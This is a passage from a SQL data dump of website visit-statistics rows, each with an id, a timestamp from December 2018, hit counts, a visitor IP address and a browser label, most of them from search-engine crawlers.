0,0,'157.55.39.188','other'),(358727,1545821874,2,2,0,0,'91.196.178.83','chrome'),(358728,1545822256,1,1,0,0,'46.229.168.154','other'),(358729,1545822762,1,1,0,0,'46.229.168.144','other'),(358730,1545822907,1,1,0,0,'66.249.66.157','chrome'),(358731,1545822908,1,1,0,0,'66.249.66.220','chrome'),(358732,1545822986,2,2,0,0,'40.77.167.41','other'),(358733,1545823168,1,1,0,0,'157.55.39.88','other'),(358734,1545823805,2,2,0,0,'216.244.66.241','other'),(358735,1545824123,1,1,0,0,'66.249.66.44','chrome'),(358736,1545824396,1,1,0,0,'8.29.198.25','other'),(358737,1545824461,1,1,0,0,'46.229.168.138','other'),(358738,1545824767,1,1,0,0,'157.55.39.88','other'),(358739,1545824898,1,1,0,0,'216.244.66.241','other'),(358740,1545825385,1,1,0,0,'8.29.198.25','other'),(358741,1545825459,1,1,0,0,'40.77.167.39','other'),(358742,1545825879,1,1,0,0,'46.229.168.137','other'),(358743,1545826886,3,3,0,0,'216.244.66.241','other'),(358744,1545827051,1,1,0,0,'157.55.39.208','other'),(358745,1545827698,2,2,0,0,'69.84.121.123','other'),(358746,1545827899,1,1,0,0,'69.84.121.123','chrome'),(358747,1545827921,1,1,0,0,'149.154.161.16','other'),(358748,1545828099,1,1,0,0,'46.211.72.0','chrome'),(358749,1545828899,2,2,0,0,'91.196.178.136','firefox'),(358750,1545828972,1,1,0,0,'66.249.66.42','chrome'),(358751,1545829129,2,2,0,0,'46.229.168.145','other'),(358752,1545829225,1,1,0,0,'66.249.66.57','chrome'),(358754,1545829699,2,2,0,0,'87.250.224.47','other'),(358755,1545829738,1,1,0,0,'46.229.168.129','other'),(358756,1545829797,1,1,0,0,'37.9.113.20','other'),(358757,1545829890,3,3,0,0,'216.244.66.241','other'),(358759,1545829894,1,1,0,0,'37.9.113.148','other'),(358760,1545830079,2,2,0,0,'157.55.39.208','other'),(358761,1545830100,5,5,0,0,'178.154.244.11','other'),(358762,1545830117,2,2,0,0,'91.124.182.170','firefox'),(358763,1545830146,2,2,0,0,'37.54.154.53','chrome'),(358764,1545830265,7,7,0,0,'95.132.3.140','chrome'),(358765,1545830381,3,3,0,0,'5.45.207.79','other'),(358766,1545830395,3,3,0,0,'5.45.207.19','other'),(358767,1545830521,2,2,0,0,'95.108.213.4','other'),(358768,1545830740,5,5,0,0,'204.12.208.10','other'),(358769,1545831093,1,1,0,0,'141.8.142.103','other'),(358770,1545831150,1,1,0,0,'178.154.244.11','other'),(358771,1545831238,2,2,0,0,'91.196.178.68','firefox'),(358772,1545831302,2,2,0,0,'162.210.196.97','other'),(358773,1545831479,2,2,0,0,'91.196.178.132','firefox'),(358774,1545832004,2,2,0,0,'91.196.178.66','firefox'),(358775,1545832116,6,6,0,0,'178.63.87.197','other'),(358776,1545832327,2,2,0,0,'46.211.111.142','chrome'),(358777,1545832348,4,4,0,0,'91.196.178.83','chrome'),(358778,1545832875,3,3,0,0,'216.244.66.241','other'),(358779,1545833188,1,1,0,0,'46.229.168.143','other'),(358780,1545834477,2,2,0,0,'91.196.178.83','chrome'),(358781,1545834512,3,3,0,0,'91.196.178.93','chrome'),(358782,1545834841,1,1,0,0,'46.229.168.141','other'),(358783,1545834842,1,1,0,0,'46.229.168.129','other'),(358784,1545835001,1,1,0,0,'180.76.15.139','other'),(358785,1545835002,1,1,0,0,'180.76.15.160','other'),(358786,1545835210,1,1,0,0,'46.229.168.148','other'),(358787,1545835232,1,1,0,0,'8.29.198.26','other'),(358788,1545835863,3,3,0,0,'216.244.66.241','other'),(358789,1545835958,1,1,0,0,'213.160.146.138','chrome'),(358790,1545836251,1,1,0,0,'8.29.198.26','other'),(358791,1545836654,2,2,0,0,'95.135.241.51','chrome'),(358792,1545837342,1,1,0,0,'46.229.168.135','other'),(358793,1545837617,1,1,0,0,'180.76.15.9','other'),(358794,1545837804,1,1,0,0,'77.111.244.146','chrome'),(358795,1545837909,2,2,0,0,'46.201.8.130','chrome'),(358796,1545838023,1,1,0,0,'5.45.207.19','other'),(358797,1545838130,1,1,0,0,'46.229.168.137','other'),(358798,1545838617,2,2,0,0,'40.77.167.46','other'),(358799,1545838756,1,1,0,0,'157.55.39.208','other'),(358800,1545838890,1,1,0,0,'46.229.168.141','other'),(358801,1545838945,1,1,0,0,'216.244.66.241','other'),(358802,1545839172,1,1,0,0,'91.196.178.56','chrome'),(358803,1545839271,3,3,0,0,'95.163.255.104','other'),(358804,1545839293,1,1,0,0,'95.163.255.114','other'),(358805,1545839301,1,1,0,0,'95.163.255.116','other'),(358806,1545839309,1,1,0,0,'95.163.255.113','other'),(358807,1545839316,1,1,0,0,'95.163.255.112','other'),(358808,1545839319,1,1,0,0,'37.53.90.175','chrome'),(358809,1545839340,1,1,0,0,'95.163.255.118','other'),(358810,1545839348,2,2,0,0,'95.163.255.119','other'),(358811,1545839489,1,1,0,0,'46.229.168.135','other'),(358812,1545839618,1,1,0,0,'180.76.15.11','other'),(358813,1545839688,1,1,0,0,'95.163.255.105','other'),(358814,1545839732,2,2,0,0,'95.163.255.117','other'),(358815,1545839950,1,1,0,0,'54.36.148.28','other'),(358816,1545839961,2,0,2,0,'37.187.26.42',''),(358817,1545840255,1,1,0,0,'216.244.66.241','other'),(358818,1545840687,2,2,0,0,'40.77.167.39','other'),(358819,1545840896,4,4,0,0,'178.154.244.11','other'),(358820,1545840979,3,3,0,0,'5.45.207.19','other'),(358821,1545841041,1,1,0,0,'66.249.66.157','chrome'),(358822,1545841042,1,1,0,0,'66.249.66.154','chrome'),(358823,1545841090,2,2,0,0,'87.250.224.47','other'),(358824,1545841229,4,4,0,0,'5.45.207.79','other'),(358825,1545841486,3,3,0,0,'141.8.142.103','other'),(358826,1545841638,1,1,0,0,'54.36.148.33','other'),(358827,1545841792,3,3,0,0,'216.244.66.241','other'),(358828,1545841929,2,2,0,0,'178.154.244.11','other'),(358829,1545842119,1,1,0,0,'46.229.168.153','other'),(358830,1545842137,1,1,0,0,'95.163.255.115','other'),(358831,1545842228,2,2,0,0,'157.55.39.186','other'),(358832,1545842564,2,2,0,0,'37.187.134.60','other'),(358833,1545842780,1,1,0,0,'66.249.66.155','chrome'),(358834,1545842781,1,1,0,0,'66.249.66.152','chrome'),(358835,1545843034,1,1,0,0,'141.8.142.103','other'),(358836,1545843068,3,3,0,0,'216.244.66.241','other'),(358837,1545843467,3,3,0,0,'134.249.146.125','chrome'),(358838,1545843594,1,1,0,0,'54.36.148.33','other'),(358839,1545843965,1,1,0,0,'46.229.168.137','other'),(358840,1545844859,2,2,0,0,'178.133.33.118','chrome'),(358841,1545845024,3,3,0,0,'216.244.66.241','other'),(358842,1545845278,1,1,0,0,'66.249.66.157','chrome'),(358843,1545845279,1,1,0,0,'66.249.66.156','chrome'),(358844,1545845879,1,1,0,0,'46.229.168.146','other'),(358845,1545846072,1,1,0,0,'8.29.198.27','other'),(358846,1545846619,1,1,0,0,'46.229.168.133','other'),(358847,1545846655,1,1,0,0,'91.196.178.104','chrome'),(358848,1545846859,1,1,0,0,'207.46.13.217','other'),(358849,1545847094,1,1,0,0,'8.29.198.27','other'),(358850,1545847599,1,1,0,0,'91.202.147.138','chrome'),(358851,1545847642,1,1,0,0,'46.229.168.150','other'),(358852,1545847870,5,5,0,0,'216.244.66.241','other'),(358853,1545847932,1,1,0,0,'46.229.168.149','other'),(358854,1545848844,2,2,0,0,'66.249.66.157','chrome'),(358856,1545848845,37,37,0,0,'66.249.66.152','chrome'),(358857,1545848864,4,4,0,0,'66.249.66.155','chrome'),(358858,1545848882,1,1,0,0,'66.249.66.156','chrome'),(358859,1545848916,3,3,0,0,'91.196.178.134','chrome'),(358860,1545848942,5,5,0,0,'66.249.66.154','chrome'),(358861,1545849062,1,1,0,0,'216.244.66.241','other'),(358862,1545849147,1,1,0,0,'46.229.168.130','other'),(358863,1545849448,2,2,0,0,'130.180.217.140','chrome'),(358864,1545849944,1,1,0,0,'104.131.147.112','other'),(358865,1545850049,13,13,0,0,'66.249.66.152','chrome'),(358866,1545850051,3,3,0,0,'66.249.66.154','chrome'),(358867,1545850067,4,4,0,0,'148.251.9.145','other'),(358868,1545850101,2,2,0,0,'66.249.66.42','chrome'),(358869,1545850113,1,1,0,0,'66.249.76.120','chrome'),(358870,1545850165,1,1,0,0,'66.249.66.44','chrome'),(358871,1545850171,2,2,0,0,'66.249.66.40','chrome'),(358872,1545850267,2,2,0,0,'91.196.178.182','chrome'),(358873,1545850380,1,1,0,0,'54.36.148.241','other'),(358874,1545850447,1,1,0,0,'46.229.168.129','other'),(358875,1545850509,1,1,0,0,'54.36.148.122','other'),(358876,1545850609,1,1,0,0,'146.120.100.22','firefox'),(358877,1545850654,1,1,0,0,'54.36.148.33','other'),(358878,1545850912,1,1,0,0,'54.36.148.219','other'),(358879,1545850916,4,4,0,0,'216.244.66.241','other'),(358880,1545851232,1,1,0,0,'66.249.66.40','chrome'),(358881,1545851242,1,1,0,0,'54.36.149.43','other'),(358882,1545851395,4,4,0,0,'66.249.66.154','chrome'),(358883,1545851396,3,3,0,0,'66.249.66.156','chrome'),(358884,1545851479,1,1,0,0,'54.36.149.210','other'),(358885,1545851624,2,2,0,0,'91.196.178.132','firefox'),(358886,1545851685,1,1,0,0,'54.36.148.39','other'),(358887,1545851816,4,4,0,0,'66.249.66.152','chrome'),(358888,1545852064,5,5,0,0,'5.45.207.79','other'),(358889,1545852140,6,6,0,0,'141.8.142.103','other'),(358890,1545852174,6,6,0,0,'5.45.207.19','other'),(358891,1545852218,1,1,0,0,'46.229.168.144','other'),(358892,1545852224,1,1,0,0,'54.36.148.24','other'),(358893,1545852270,2,2,0,0,'95.108.213.4','other'),(358894,1545852290,7,7,0,0,'178.154.244.11','other'),(358895,1545852440,2,2,0,0,'66.249.66.154','chrome'),(358896,1545852546,1,1,0,0,'66.249.66.156','chrome'),(358897,1545852557,1,1,0,0,'54.36.148.76','other'),(358898,1545852791,2,2,0,0,'87.250.224.47','other'),(358899,1545852818,1,1,0,0,'141.8.142.108','other'),(358900,1545852867,1,1,0,0,'54.36.149.0','other'),(358901,1545852924,1,1,0,0,'54.36.148.199','other'),(358902,1545853017,1,1,0,0,'5.45.207.79','other'),(358903,1545853128,1,1,0,0,'54.36.148.243','other'),(358904,1545853187,1,1,0,0,'54.36.148.47','other'),(358905,1545853197,2,2,0,0,'46.211.109.49','chrome'),(358906,1545853207,1,1,0,0,'54.36.149.22','other'),(358907,1545853226,1,1,0,0,'37.9.113.103','other'),(358908,1545853260,1,1,0,0,'54.36.148.206','other'),(358909,1545853271,1,1,0,0,'5.45.207.19','other'),(358910,1545853387,1,1,0,0,'54.36.149.72','other'),(358911,1545853557,1,1,0,0,'54.36.148.67','other'),(358912,1545853585,1,1,0,0,'46.118.212.206','chrome'),(358913,1545853794,1,1,0,0,'178.154.244.11','other'),(358914,1545853807,1,1,0,0,'66.249.66.154','chrome'),(358915,1545853937,1,1,0,0,'54.36.148.58','other'),(358916,1545853967,1,1,0,0,'46.211.148.106','chrome'),(358917,1545853969,3,3,0,0,'216.244.66.241','other'),(358918,1545854067,1,1,0,0,'54.36.148.139','other'),(358919,1545854088,1,1,0,0,'54.36.148.38','other'),(358920,1545854195,1,1,0,0,'54.36.149.105','other'),(358921,1545854284,1,1,0,0,'46.229.168.145','other'),(358922,1545854343,1,1,0,0,'193.194.127.115','chrome'),(358923,1545854366,1,1,0,0,'157.55.39.62','other'),(358924,1545854694,1,1,0,0,'54.36.149.45','other'),(358925,1545854718,1,1,0,0,'54.36.148.57','other'),(358926,1545854737,1,1,0,0,'46.229.168.141','other'),(358927,1545854932,1,1,0,0,'66.249.66.40','chrome'),(358928,1545855054,2,2,0,0,'66.249.66.156','chrome'),(358929,1545855092,1,1,0,0,'54.36.148.148','other'),(358930,1545855612,1,1,0,0,'54.36.148.16','other'),(358931,1545855627,2,2,0,0,'91.196.178.52','chrome'),(358932,1545855921,1,1,0,0,'54.36.149.89','other'),(358933,1545855926,1,1,0,0,'54.36.148.41','other'),(358934,1545856031,1,1,0,0,'54.36.148.178','other'),(358935,1545856259,1,1,0,0,'54.36.148.30','other'),(358936,1545856414,1,1,0,0,'54.36.149.19','other'),(358937,1545856479,1,1,0,0,'54.36.148.18','other'),(358938,1545856560,1,1,0,0,'54.36.148.156','other'),(358939,1545856728,3,3,0,0,'66.249.66.154','chrome'),(358940,1545856735,1,1,0,0,'54.36.148.237','other'),(358941,1545856751,1,1,0,0,'66.249.66.157','chrome'),(358942,1545856801,2,2,0,0,'66.249.66.44','chrome'),(358943,1545856903,1,1,0,0,'8.29.198.26','other'),(358944,1545856932,8,8,0,0,'216.244.66.241','other'),(358945,1545856949,1,1,0,0,'54.36.149.16','other'),(358946,1545856971,1,1,0,0,'54.36.148.23','other'),(358947,1545857103,1,1,0,0,'157.55.39.250','other'),(358948,1545857282,1,1,0,0,'54.36.149.0','other'),(358949,1545857298,1,1,0,0,'66.249.66.152','chrome'),(358950,1545857668,1,1,0,0,'54.36.148.76','other'),(358951,1545857937,1,1,0,0,'8.29.198.27','other'),(358952,1545858018,1,1,0,0,'54.36.148.188','other'),(358953,1545858121,1,1,0,0,'54.36.148.146','other'),(358954,1545858329,1,1,0,0,'216.244.66.241','other'),(358955,1545858376,1,1,0,0,'54.36.148.166','other'),(358956,1545858505,1,1,0,0,'54.36.149.82','other'),(358957,1545858666,1,1,0,0,'207.46.13.167','other'),(358958,1545858668,1,1,0,0,'54.36.149.58','other'),(358959,1545858876,1,1,0,0,'54.36.148.38','other'),(358960,1545858886,1,1,0,0,'54.36.148.19','other'),(358961,1545858941,1,1,0,0,'54.36.148.62','other'),(358962,1545858960,1,1,0,0,'54.36.148.79','other'),(358963,1545858987,1,1,0,0,'54.36.149.48','other'),(358964,1545859008,1,1,0,0,'54.36.148.111','other'),(358965,1545859122,2,2,0,0,'46.229.168.151','other'),(358966,1545859468,3,3,0,0,'66.249.66.152','chrome'),(358967,1545859501,1,1,0,0,'54.36.148.220','other'),(358968,1545859578,1,1,0,0,'54.36.148.186','other'),(358969,1545859700,1,1,0,0,'66.249.66.156','chrome'),(358970,1545859745,1,1,0,0,'66.249.66.157','chrome'),(358971,1545859784,1,1,0,0,'54.36.148.141','other'),(358972,1545859829,1,1,0,0,'66.249.66.154','chrome'),(358973,1545859875,8,8,0,0,'216.244.66.241','other'),(358974,1545859954,1,1,0,0,'54.36.149.64','other'),(358975,1545860333,1,1,0,0,'54.36.149.41','other'),(358976,1545860352,1,1,0,0,'157.55.39.247','other'),(358977,1545860362,1,1,0,0,'66.249.66.155','chrome'),(358978,1545860365,1,1,0,0,'54.36.149.53','other'),(358979,1545860408,1,1,0,0,'54.36.148.207','other'),(358980,1545860508,1,1,0,0,'54.36.148.189','other'),(358981,1545860523,1,1,0,0,'54.36.148.114','other'),(358982,1545860660,1,1,0,0,'54.36.149.45','other'),(358983,1545860790,1,1,0,0,'54.36.148.111','other'),(358984,1545860916,2,2,0,0,'216.244.66.241','other'),(358985,1545861584,1,1,0,0,'54.36.148.125','other'),(358986,1545861625,1,1,0,0,'66.249.66.157','chrome'),(358987,1545861626,1,1,0,0,'66.249.66.156','chrome'),(358988,1545861913,1,1,0,0,'66.249.66.152','chrome'),(358989,1545861947,1,1,0,0,'207.46.13.167','other'),(358990,1545862047,1,1,0,0,'37.73.222.199','chrome'),(358991,1545862165,1,1,0,0,'178.154.200.48','other'),(358992,1545862194,2,2,0,0,'178.154.244.11','other'),(358993,1545862209,1,1,0,0,'54.36.148.41','other'),(358994,1545862221,1,1,0,0,'37.9.113.20','other'),(358995,1545862308,1,1,0,0,'54.36.149.89','other'),(358996,1545862311,1,1,0,0,'95.108.213.4','other'),(358997,1545862356,1,1,0,0,'54.36.149.70','other'),(358998,1545862370,1,1,0,0,'37.9.113.148','other'),(358999,1545862400,1,1,0,0,'178.154.244.65','other'),(359000,1545862473,1,1,0,0,'213.180.203.9','other'),(359001,1545862476,2,2,0,0,'178.154.171.24','other'),(359002,1545862593,3,3,0,0,'141.8.183.22','other'),(359003,1545862596,1,1,0,0,'141.8.142.191','other'),(359004,1545862599,1,1,0,0,'66.249.66.154','chrome'),(359005,1545862660,5,5,0,0,'5.45.207.79','other'),(359006,1545862705,1,1,0,0,'5.255.253.38','other'),(359007,1545862748,1,1,0,0,'95.108.181.75','other'),(359008,1545862751,2,2,0,0,'178.154.171.27','other'),(359009,1545862852,1,1,0,0,'54.36.148.40','other'),(359010,1545862857,1,1,0,0,'54.36.149.8','other'),(359011,1545862864,1,1,0,0,'95.108.181.54','other'),(359012,1545862900,1,1,0,0,'141.8.142.38','other'),(359013,1545862924,1,1,0,0,'37.9.113.103','other'),(359014,1545863038,1,1,0,0,'54.36.149.84','other'),(359015,1545863061,4,4,0,0,'157.55.39.250','other'),(359016,1545863101,3,3,0,0,'178.154.244.11','other'),(359017,1545863129,3,3,0,0,'5.45.207.19','other'),(359018,1545863164,3,3,0,0,'216.244.66.241','other'),(359019,1545863246,3,3,0,0,'157.55.39.245','other'),(359020,1545863308,1,1,0,0,'95.163.255.63','other'),(359021,1545863312,1,1,0,0,'95.163.255.67','other'),(359022,1545863844,1,1,0,0,'66.249.66.157','chrome'),(359023,1545863847,2,2,0,0,'66.249.66.154','chrome'),(359024,1545863851,2,2,0,0,'66.249.66.156','chrome'),(359025,1545863852,1,1,0,0,'66.249.66.152','chrome'),(359026,1545863888,1,1,0,0,'54.36.148.56','other'),(359027,1545863967,1,1,0,0,'54.36.148.47','other'),(359028,1545864076,1,1,0,0,'141.8.142.103','other'),(359029,1545864098,1,1,0,0,'54.36.148.241','other'),(359030,1545864155,1,1,0,0,'54.36.148.219','other'),(359031,1545864316,1,1,0,0,'46.229.168.138','other'),(359032,1545864418,1,1,0,0,'54.36.148.16','other'),(359033,1545864498,1,1,0,0,'54.36.148.143','other'),(359034,1545864516,1,1,0,0,'178.154.200.48','other'),(359035,1545864536,1,1,0,0,'54.36.149.68','other'),(359036,1545864544,1,1,0,0,'141.8.132.16','other'),(359037,1545864636,1,1,0,0,'178.154.244.11','other'),(359038,1545864642,1,1,0,0,'87.250.224.47','other'),(359039,1545864654,1,1,0,0,'54.36.148.175','other'),(359040,1545864726,1,1,0,0,'141.8.183.23','other'),(359041,1545864913,1,1,0,0,'216.244.66.241','other'),(359042,1545865010,1,1,0,0,'54.36.148.240','other'),(359043,1545865223,1,1,0,0,'54.36.149.51','other'),(359044,1545865390,1,1,0,0,'54.36.148.89','other'),(359045,1545865393,1,1,0,0,'5.45.207.79','other'),(359046,1545865394,1,1,0,0,'5.45.207.19','other'),(359047,1545865552,2,2,0,0,'207.46.13.167','other'),(359048,1545865576,1,1,0,0,'54.36.148.145','other'),(359049,1545865692,1,1,0,0,'66.249.66.157','chrome'),(359050,1545865693,1,1,0,0,'66.249.66.152','chrome'),(359051,1545865713,1,1,0,0,'54.36.149.71','other'),(359052,1545865752,3,3,0,0,'157.55.39.245','other'),(359053,1545865896,10,10,0,0,'216.244.66.241','other'),(359054,1545865929,1,1,0,0,'54.36.149.30','other'),(359055,1545866066,1,1,0,0,'54.36.149.42','other'),(359056,1545866087,1,1,0,0,'54.36.148.52','other'),(359057,1545866098,1,1,0,0,'54.36.148.25','other'),(359058,1545866128,1,1,0,0,'54.36.149.56','other'),(359059,1545866158,1,1,0,0,'54.36.148.158','other'),(359060,1545866214,1,1,0,0,'54.36.148.166','other'),(359061,1545866289,1,1,0,0,'54.36.148.90','other'),(359062,1545866397,1,1,0,0,'66.249.66.154','chrome'),(359063,1545866552,1,1,0,0,'54.36.148.79','other'),(359064,1545866635,1,1,0,0,'54.36.148.202','other'),(359065,1545866722,1,1,0,0,'207.46.13.167','other'),(359066,1545866807,2,2,0,0,'216.244.66.241','other'),(359067,1545867053,1,1,0,0,'95.163.255.109','other'),(359068,1545867411,1,1,0,0,'54.36.148.12','other'),(359069,1545867449,1,1,0,0,'54.36.149.52','other'),(359070,1545867484,1,1,0,0,'95.163.255.105','other'),(359071,1545867499,1,1,0,0,'46.229.168.137','other'),(359072,1545867537,2,2,0,0,'54.36.149.102','other'),(359073,1545867743,1,1,0,0,'8.29.198.27','other'),(359074,1545867785,1,1,0,0,'141.8.142.103','other'),(359075,1545867837,1,1,0,0,'54.36.148.96','other'),(359076,1545868058,1,1,0,0,'54.36.148.165','other'),(359077,1545868191,1,1,0,0,'54.36.148.47','other'),(359078,1545868201,1,1,0,0,'54.36.149.4','other'),(359079,1545868414,1,1,0,0,'157.55.39.245','other'),(359080,1545868534,1,1,0,0,'54.36.148.36','other'),(359081,1545868680,1,1,0,0,'54.36.148.243','other'),(359082,1545868731,1,1,0,0,'54.36.148.163','other'),(359083,1545868763,1,1,0,0,'46.229.168.140','other'),(359084,1545868783,1,1,0,0,'8.29.198.26','other'),(359085,1545868867,1,1,0,0,'54.36.148.191','other'),(359086,1545868913,1,1,0,0,'54.36.149.76','other'),(359087,1545868927,1,1,0,0,'54.36.148.203','other'),(359088,1545868958,1,1,0,0,'54.36.148.127','other'),(359089,1545868987,4,4,0,0,'216.244.66.241','other'),(359090,1545869098,1,1,0,0,'54.36.149.11','other'),(359091,1545869163,1,1,0,0,'207.46.13.167','other'),(359092,1545869314,1,1,0,0,'54.36.149.55','other'),(359093,1545869499,1,1,0,0,'66.249.66.157','chrome'),(359094,1545869500,1,1,0,0,'66.249.66.156','chrome'),(359095,1545869781,1,1,0,0,'54.36.148.214','other'),(359096,1545870001,1,1,0,0,'54.36.148.52','other'),(359097,1545870008,1,1,0,0,'54.36.148.21','other'),(359098,1545870060,1,1,0,0,'66.249.66.152','chrome'),(359099,1545870269,1,1,0,0,'54.36.148.240','other'),(359100,1545870405,1,1,0,0,'54.36.149.54','other'),(359101,1545870531,1,1,0,0,'216.244.66.241','other'),(359102,1545870583,1,1,0,0,'54.36.148.161','other'),(359103,1545870650,1,1,0,0,'46.229.168.147','other'),(359104,1545870652,1,1,0,0,'46.229.168.130','other'),(359105,1545870800,1,1,0,0,'66.249.66.157','chrome'),(359106,1545870801,1,1,0,0,'66.249.66.156','chrome'),(359107,1545870869,1,1,0,0,'157.55.39.245','other'),(359108,1545871120,1,1,0,0,'54.36.148.55','other'),(359109,1545871126,1,1,0,0,'54.36.148.88','other'),(359110,1545871185,1,1,0,0,'180.76.15.142','other'),(359111,1545871186,1,1,0,0,'180.76.15.33','other'),(359112,1545871474,1,1,0,0,'54.36.148.245','other'),(359113,1545871495,3,3,0,0,'207.46.13.167','other'),(359114,1545871564,1,1,0,0,'54.36.149.31','other'),(359115,1545871566,1,1,0,0,'54.36.148.189','other'),(359116,1545871577,1,1,0,0,'5.45.207.79','other'),(359117,1545871668,1,1,0,0,'46.229.168.135','other'),(359118,1545871912,1,1,0,0,'54.36.149.11','other'),(359119,1545871916,2,2,0,0,'157.55.39.245','other'),(359120,1545872079,1,1,0,0,'54.36.148.12','other'),(359121,1545872084,1,1,0,0,'54.36.148.58','other'),(359122,1545872128,1,1,0,0,'185.107.94.183','other'),(359123,1545872296,1,1,0,0,'54.36.149.24','other'),(359124,1545872362,1,1,0,0,'54.36.148.170','other'),(359125,1545872452,1,1,0,0,'54.36.149.36','other'),(359126,1545872569,1,1,0,0,'54.36.148.183','other'),(359127,1545872588,2,2,0,0,'5.45.207.79','other'),(359128,1545872669,1,1,0,0,'66.249.66.42','chrome'),(359129,1545872803,1,1,0,0,'54.36.148.67','other'),(359130,1545872925,1,1,0,0,'54.36.148.137','other'),(359131,1545873071,1,1,0,0,'5.188.210.53','chrome'),(359132,1545873204,3,3,0,0,'5.45.207.19','other'),(359133,1545873474,1,1,0,0,'54.36.148.159','other'),(359134,1545873507,1,1,0,0,'54.36.149.5','other'),(359135,1545873520,1,1,0,0,'37.9.113.148','other'),(359136,1545873551,2,2,0,0,'5.45.207.79','other'),(359137,1545873590,3,3,0,0,'95.108.213.4','other'),(359138,1545873598,3,3,0,0,'141.8.142.103','other'),(359139,1545873726,1,1,0,0,'54.36.149.7','other'),(359140,1545873740,1,1,0,0,'54.36.149.27','other'),(359141,1545873758,1,1,0,0,'95.108.181.75','other'),(359142,1545873760,4,4,0,0,'87.250.224.47','other'),(359143,1545873762,2,2,0,0,'87.250.224.65','other'),(359144,1545873799,1,1,0,0,'54.36.148.51','other'),(359145,1545873801,1,1,0,0,'213.180.203.9','other'),(359146,1545873844,1,1,0,0,'178.154.171.24','other'),(359147,1545873922,1,1,0,0,'54.36.148.97','other'),(359148,1545874030,1,1,0,0,'54.36.148.156','other'),(359149,1545874297,2,2,0,0,'5.45.207.19','other'),(359150,1545874345,1,1,0,0,'54.36.149.19','other'),(359151,1545874596,1,1,0,0,'54.36.149.107','other'),(359152,1545874826,1,1,0,0,'5.45.207.79','other'),(359153,1545874879,1,1,0,0,'54.36.148.222','other'),(359154,1545874909,1,1,0,0,'54.36.148.247','other'),(359155,1545874920,1,1,0,0,'54.36.148.131','other'),(359156,1545874964,3,3,0,0,'216.244.66.241','other'),(359157,1545875028,1,1,0,0,'54.36.149.97','other'),(359158,1545875223,1,1,0,0,'54.36.149.102','other'),(359159,1545875360,1,1,0,0,'54.36.148.181','other'),(359160,1545875365,1,1,0,0,'95.108.213.4','other'),(359161,1545875448,1,1,0,0,'54.36.149.11','other'),(359162,1545875451,1,1,0,0,'54.36.148.49','other'),(359163,1545875518,1,1,0,0,'157.55.39.250','other'),(359164,1545875749,1,1,0,0,'54.36.148.177','other'),(359165,1545875757,1,1,0,0,'54.36.148.162','other'),(359166,1545875962,1,1,0,0,'46.229.168.144','other'),(359167,1545876036,1,1,0,0,'54.36.149.97','other'),(359168,1545876040,1,1,0,0,'54.36.149.9','other'),(359169,1545876063,3,3,0,0,'216.244.66.241','other'),(359170,1545876127,1,1,0,0,'178.255.215.94','other'),(359171,1545876234,1,1,0,0,'46.229.168.129','other'),(359172,1545876235,1,1,0,0,'46.229.168.148','other'),(359173,1545876429,1,1,0,0,'54.36.148.58','other'),(359174,1545876511,1,1,0,0,'54.36.149.79','other'),(359175,1545876528,1,1,0,0,'46.229.168.149','other'),(359176,1545876631,1,1,0,0,'66.249.66.57','chrome'),(359177,1545876762,1,1,0,0,'54.36.148.22','other'),(359178,1545876795,1,1,0,0,'157.55.39.250','other'),(359179,1545876920,2,2,0,0,'54.36.148.11','other'),(359180,1545877006,1,1,0,0,'54.36.148.250','other'),(359181,1545877438,1,1,0,0,'46.229.168.135','other'),(359182,1545877459,1,1,0,0,'54.36.149.33','other'),(359183,1545877491,1,1,0,0,'54.36.148.146','other'),(359184,1545877726,1,1,0,0,'54.36.148.189','other'),(359185,1545877823,1,1,0,0,'54.36.148.47','other'),(359186,1545877871,4,4,0,0,'216.244.66.241','other'),(359187,1545877998,1,1,0,0,'54.36.148.37','other'),(359188,1545878069,1,1,0,0,'54.36.149.8','other'),(359189,1545878148,1,1,0,0,'54.36.148.110','other'),(359190,1545878368,1,1,0,0,'54.36.148.171','other'),(359191,1545878414,1,1,0,0,'54.36.148.24','other'),(359192,1545878424,1,1,0,0,'54.36.149.47','other'),(359193,1545878454,1,1,0,0,'157.55.39.250','other'),(359194,1545878465,1,1,0,0,'66.249.66.154','chrome'),(359195,1545878467,1,1,0,0,'66.249.66.155','chrome'),(359196,1545878566,1,1,0,0,'8.29.198.27','other'),(359197,1545879271,1,1,0,0,'54.36.148.54','other'),(359198,1545879371,1,1,0,0,'54.36.148.37','other'),(359199,1545879389,1,1,0,0,'54.36.148.167','other'),(359200,1545879632,1,1,0,0,'8.29.198.26','other'),(359201,1545879715,1,1,0,0,'54.36.148.236','other'),(359202,1545879817,1,1,0,0,'54.36.148.192','other'),(359203,1545879926,1,1,0,0,'54.36.148.231','other'),(359204,1545879973,1,1,0,0,'54.36.148.245','other'),(359205,1545880065,1,1,0,0,'46.229.168.143','other'),(359206,1545880079,1,1,0,0,'54.36.148.21','other'),(359207,1545880112,1,1,0,0,'54.36.148.166','other'),(359208,1545880223,1,1,0,0,'54.36.148.174','other'),(359209,1545880283,1,1,0,0,'46.229.168.144','other'),(359210,1545880285,1,1,0,0,'46.229.168.140','other'),(359211,1545880343,1,1,0,0,'54.36.148.51','other'),(359212,1545880787,1,1,0,0,'54.36.148.227','other'),(359213,1545880845,3,3,0,0,'216.244.66.241','other'),(359214,1545880961,1,1,0,0,'88.99.2.203','other'),(359215,1545881008,5,5,0,0,'136.243.70.68','other'),(359216,1545881188,1,1,0,0,'46.229.168.142','other'),(359217,1545881190,1,1,0,0,'46.229.168.149','other'),(359218,1545881378,1,1,0,0,'54.36.148.116','other'),(359219,1545881546,1,1,0,0,'54.36.148.55','other'),(359220,1545881581,1,1,0,0,'54.36.148.205','other'),(359221,1545881611,1,1,0,0,'46.229.168.153','other'),(359222,1545881774,1,1,0,0,'54.36.148.235','other'),(359223,1545881905,1,1,0,0,'54.36.148.38','other'),(359224,1545881935,1,1,0,0,'54.36.148.156','other'),(359225,1545882041,1,1,0,0,'216.244.66.241','other'),(359226,1545882184,1,1,0,0,'54.36.148.232','other'),(359227,1545882266,1,1,0,0,'46.211.46.245','chrome'),(359228,1545882453,1,1,0,0,'66.249.66.157','chrome'),(359229,1545882482,1,1,0,0,'66.249.66.152','chrome'),(359230,1545882601,2,2,0,0,'35.161.251.125','chrome'),(359231,1545882736,1,1,0,0,'54.36.149.39','other'),(359232,1545882865,1,1,0,0,'54.36.148.186','other'),(359233,1545882945,1,1,0,0,'54.36.149.25','other'),(359234,1545883068,1,1,0,0,'109.169.196.204','chrome'),(359235,1545883088,1,1,0,0,'54.36.148.19','other'),(359236,1545883128,2,2,0,0,'91.196.178.136','firefox'),(359237,1545883172,1,1,0,0,'54.36.148.86','other'),(359238,1545883267,1,1,0,0,'157.55.39.245','other'),(359239,1545883565,1,1,0,0,'157.